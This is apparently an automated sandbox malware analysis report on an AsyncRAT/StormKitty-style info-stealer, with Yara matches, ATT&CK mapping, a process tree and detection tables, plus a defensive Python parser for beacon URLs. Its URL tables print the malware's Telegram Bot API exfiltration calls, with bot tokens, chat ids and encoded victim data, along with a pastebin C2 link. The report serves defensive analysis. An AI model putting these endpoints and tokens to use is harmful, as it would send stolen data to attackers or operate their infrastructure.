Source: Yara match, file source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match, file source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match, file source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED

Remote Access Functionality

Source: Yara match, file source: 7.2.svchost.exe.7450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.436ff90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.7450000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.42d10e8.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.436ff90.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.2934826064.0000000007450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, file source: 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match, file source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match, file source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: Yara match, file source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match, file source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match, file source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: Yara match, file source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
Source: Yara match, file source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
MITRE ATT&CK Matrix

One line per tactic column, cells listed top to bottom. A number in front of a technique is the numeric badge the report shows in that matrix cell; techniques without a number were not triggered by this sample.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 131 Windows Management Instrumentation; 2 Scheduled Task/Job; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Scripting; 1 DLL Side-Loading; 2 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 112 Process Injection; 2 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 111 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 11 Masquerading; 1 Modify Registry; 251 Virtualization/Sandbox Evasion; 112 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 File and Directory Discovery; 134 System Information Discovery; 441 Security Software Discovery; 2 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 2 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 Data Encrypted for Impact; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1464066, Sample: zrrHgsDzgS.exe, Start date: 28/06/2024, Architecture: WINDOWS, Score: 100)

Network at sample level: pastebin.com; api.telegram.org; 4 other IPs or domains
Signatures at sample level: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Found malware configuration; 23 other signatures; Connects to a pastebin service (likely for C&C) [pastebin.com]; Uses the Telegram API (likely for C&C communication) [api.telegram.org]

zrrHgsDzgS.exe
  dropped: C:\Users\user\AppData\Roaming\svchost.exe (PE32); C:\Users\user\AppData\...\zrrHgsDzgS.exe.log (ASCII)
  signatures: Drops PE files with benign system names
  +- cmd.exe
  |    signatures: Bypasses PowerShell execution policy; Uses schtasks.exe or at.exe to add and modify task schedules; Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
  |    +- conhost.exe
  |    +- schtasks.exe
  +- cmd.exe
       +- svchost.exe
       +- conhost.exe
       +- timeout.exe

svchost.exe
  network: 94.232.249.111 (ports 49739, 49740, 64789; INT-PDN-STE-AS STE PDN Internal AS, SY, Syrian Arab Republic); 127.0.0.1 (unknown)
  dropped: C:\Users\user\AppData\Local\Temp\udwnme.exe (PE32); C:\Users\user\AppData\Local\Temp\luglzv.exe (PE32)
  signatures: System process connects to network (likely due to code injection or exploit); Multi AV Scanner detection for dropped file; Found many strings related to Crypto-Wallets (likely being stolen)
  +- cmd.exe
  |    signatures: Suspicious powershell command line found
  |    +- powershell.exe
  |    |    +- luglzv.exe
  |    |         network: pastebin.com (104.20.4.235:443, CLOUDFLARENET, US, United States)
  |    |         dropped: C:\Users\user\AppData\...87WTVCDUMOB.jpg (ASCII); C:\Users\user\AppData\...\KATAXZVCPS.xlsx (ASCII); C:\Users\user\AppData\...\UMMBDNEQBN.pdf (ASCII); 2 other malicious files
  |    |         signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal WLAN passwords; Modifies existing user documents (likely ransomware behavior)
  |    |         +- cmd.exe (4 other processes)
  |    |         +- cmd.exe (3 other processes)
  |    +- conhost.exe
  +- cmd.exe
       +- powershell.exe
       |    +- udwnme.exe
       |         network: api.telegram.org (149.154.167.220:443, TELEGRAM, RU, United Kingdom); icanhazip.com (104.16.184.241:80, CLOUDFLARENET, US, United States); api.mylnikov.org (104.21.44.66:443, CLOUDFLARENET, US, United States)
       |         signatures: Multi AV Scanner detection for dropped file; Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
       |         +- cmd.exe
       |         |    signatures: Tries to harvest and steal WLAN passwords
       |         |    +- conhost.exe; chcp.com; netsh.exe; findstr.exe
       |         +- cmd.exe
       |              +- conhost.exe; chcp.com; netsh.exe
       +- conhost.exe

Antivirus detection, initial sample (Source | Detection | Scanner | Label)
zrrHgsDzgS.exe | 87% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT
zrrHgsDzgS.exe | 82% | Virustotal |
zrrHgsDzgS.exe | 100% | Avira | TR/Dropper.Gen
zrrHgsDzgS.exe | 100% | Joe Sandbox ML |

Antivirus detection, dropped files (Source | Detection | Scanner | Label)
C:\Users\user\AppData\Local\Temp\udwnme.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT
C:\Users\user\AppData\Roaming\svchost.exe | 87% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRAT

No Antivirus matches

Antivirus detection, domains (Source | Detection | Scanner | Label)
api.mylnikov.org | 3% | Virustotal |
api.telegram.org | 2% | Virustotal |
pastebin.com | 0% | Virustotal |
icanhazip.com | 0% | Virustotal |
107.143.13.0.in-addr.arpa | 0% | Virustotal |
206.23.85.13.in-addr.arpa | 1% | Virustotal |

Antivirus detection, URLs (Source | Detection | Scanner | Label)
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://support.mozilla.org | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 1% | Virustotal |
https://duckduckgo.com/ac/?q= | 0% | Virustotal |
https://api.telegram.org | 1% | Virustotal |
https://duckduckgo.com/chrome_newtab | 0% | Virustotal |
https://api.telegram.orgD | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True | 0% | Avira URL Cloud | safe
http://icanhazip.com/ | 0% | Avira URL Cloud | safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d | 0% | Avira URL Cloud | safe
http://icanhazip.com/ | 0% | Virustotal |
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True | 0% | Avira URL Cloud | safe
https://pastebin.com/raw/7B75u64Bd | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=57954 | 0% | Avira URL Cloud | safe
https://github.com/LimerBoy/StormKitty | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795 | 0% | Avira URL Cloud | safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | 0% | Avira URL Cloud | safe
https://api.mylnikov.org | 0% | Avira URL Cloud | safe
http://api.telegram.orgd | 0% | Avira URL Cloud | safe
https://github.com/LimerBoy/StormKitty | 2% | Virustotal |
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 | 0% | Avira URL Cloud | safe
http://icanhazip.com | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283 | 0% | Avira URL Cloud | safe
https://api.mylnikov.org | 3% | Virustotal |
https://github.com/LimerBoy/StormKittyTCfq$ | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13 | 0% | Avira URL Cloud | safe
http://icanhazip.com | 0% | Virustotal |
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13 | 9% | Virustotal |
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 | 0% | Avira URL Cloud | safe
https://github.com/LimerBoy/StormKitty0&nq | 0% | Avira URL Cloud | safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid= | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
http://pastebin.comd | 0% | Avira URL Cloud | safe
https://github.com/LimerBoy/StormKitty0&nq | 3% | Virustotal |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | Avira URL Cloud | safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid= | 1% | Virustotal |
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | 1% | Virustotal |
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=57954 | 0% | Avira URL Cloud | safe
http://icanhazip.comd | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | 0% | Avira URL Cloud | safe
http://icanhazip.com/t | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283 | 1% | Virustotal |
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 | 0% | Virustotal |
https://api.mylnikov.org/geolocation/wifi?v=1.1& | 0% | Avira URL Cloud | safe
https://api.tele | 0% | Avira URL Cloud | safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | 0% | Virustotal |
http://icanhazip.com/t | 0% | Virustotal |
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage | 0% | Avira URL Cloud | safe
http://api.mylnikov.orgd | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Virustotal |
https://api.telegram.org/file/bot | 0% | Avira URL Cloud | safe
https://api.mylnikov.org/geolocation/wifi?v=1.1& | 0% | Virustotal |
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | 0% | Avira URL Cloud | safe
http://api.telegram.org | 0% | Avira URL Cloud | safe
http://api.mylnikov.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/file/bot | 0% | Virustotal |
http://pastebin.com | 0% | Avira URL Cloud | safe
https://pastebin.com | 0% | Avira URL Cloud | safe
https://pastebin.com/raw/7B75u64B | 0% | Avira URL Cloud | safe
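The `sendMessage` URLs in the table above are the stealer's beacons: the bot token sits in the path, the operator's `chat_id` in the query, and the whole WorldWind report body is percent-encoded into `text`. Decoding them by hand is error-prone, so the Python below, an added example that is not code from the report, from Joe Sandbox or from the malware, parses such URLs into the fields a responder needs (bot id, a token fingerprint rather than the live token, API method, chat id, and the body as label/value pairs) and skips strings that are not a complete Bot API call. The sample URLs are constructed in the report's layout with a fake token, a fake chat id and a documentation-range external IP; the other field values copy the decoded body of the report's beacon.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Bot API path: /bot<numeric bot id>:<token>/<method>
BOT_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/(\w+)$")
# "Label: value" lines of the Markdown body; labels are plain words, value non-empty.
FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?):\s*(\S.*?)\s*$")


def token_fingerprint(token: str) -> str:
    """Short SHA-256 prefix so the live bot token never has to be pasted into a ticket."""
    return hashlib.sha256(token.encode()).hexdigest()[:12]


def parse_report_text(text: str) -> dict:
    """Turn the decoded beacon body into {label: value}. Emoji and Markdown emphasis are
    stripped first; section headers such as '*Network:*' carry no value and are skipped."""
    fields = {}
    for raw in text.splitlines():
        line = re.sub(r"[^\x20-\x7e]", "", raw).replace("*", "")
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def parse_telegram_beacon(url: str) -> dict:
    """Return bot id, token fingerprint, API method, chat id, decoded body and fields.
    Raises ValueError for strings that are not a complete Bot API call (the bare
    https://api.telegram.org/bot fragments in the report). A URL whose query was
    truncated still parses, so compare chat_id lengths across hits before treating a
    short one as a distinct indicator."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        raise ValueError(f"not a Telegram Bot API host: {parts.hostname}")
    m = BOT_PATH_RE.match(parts.path)
    if not m:
        raise ValueError(f"no bot token/method in path: {parts.path}")
    bot_id, token, method = m.groups()
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes each value
    text = qs.get("text", [""])[0]
    return {
        "bot_id": bot_id,
        "token_fp": token_fingerprint(token),
        "method": method,
        "chat_id": qs.get("chat_id", [""])[0],
        "text": text,
        "fields": parse_report_text(text),
    }


def extract_beacons(urls):
    """Parse every URL that is a Bot API call; skip the rest (icanhazip, pastebin,
    bare fragments) so one odd string does not abort triage of the whole list."""
    beacons = []
    for url in urls:
        try:
            beacons.append(parse_telegram_beacon(url))
        except ValueError:
            continue
    return beacons


# CONSTRUCTED sample list: a full beacon in the report's layout (fake token/chat id,
# documentation-range external IP), a truncated fragment, and two non-beacon strings.
SAMPLE_URLS = [
    "https://api.telegram.org/bot1234567890:AAFakeTokenForIllustrationOnly0123456789/sendMessage"
    "?chat_id=1111111111&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*"
    "%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)"
    "%0AUsername:%20user%0ACompName:%20888683%0AAntivirus:%20Windows%20Defender."
    "%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1"
    "%0AExternal%20IP:%20203.0.113.7%0ABSSID:%2000:50:56:a7:21:15"
    "%0APower:%20NoSystemBattery%20(1%25)&parse_mode=Markdown&disable_web_page_preview=True",
    "https://api.telegram.org/bot1234567890:AAFakeTokenForIllustrationOnly0123456789/sendDocument?chat_id=1111",
    "https://api.telegram.org/bot",
    "http://icanhazip.com/",
]

if __name__ == "__main__":
    for beacon in extract_beacons(SAMPLE_URLS):
        print(beacon["method"], beacon["bot_id"], beacon["chat_id"], beacon["token_fp"])
        for label, value in beacon["fields"].items():
            print(f"  {label}: {value}")
```

Run against the report's own URL list, the parser yields the bot ids and chat ids as indicators and the decoded body as victim context (hostname, external IP, BSSID); the token fingerprint lets two analysts confirm they are looking at the same bot without either of them copying the secret around.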
Domains contacted (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
api.mylnikov.org | 104.21.44.66 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
pastebin.com | 104.20.4.235 | true | true | | unknown
icanhazip.com | 104.16.184.241 | true | false | | unknown
107.143.13.0.in-addr.arpa | unknown | unknown | true | | unknown
206.23.85.13.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/ | false | 0% (Virustotal); Avira URL Cloud: safe | unknown
